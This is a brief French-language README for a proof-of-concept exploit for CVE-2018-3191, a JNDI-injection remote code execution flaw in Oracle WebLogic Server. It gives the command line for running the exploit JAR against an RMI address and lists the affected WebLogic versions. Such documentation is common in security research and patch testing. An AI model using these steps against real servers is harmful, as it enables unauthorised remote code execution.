
Exploit de preuve de concept pour CVE-2018-3191 ciblant WebLogic Server via l'injection JNDI. Distribue une charge utile JAR pour déclencher une exécution de code à distance via Spring JNDI.
Utilisation :
java -jar weblogic-spring-jndi.jar <jndi_address>
Exemple :
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Remarque :
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1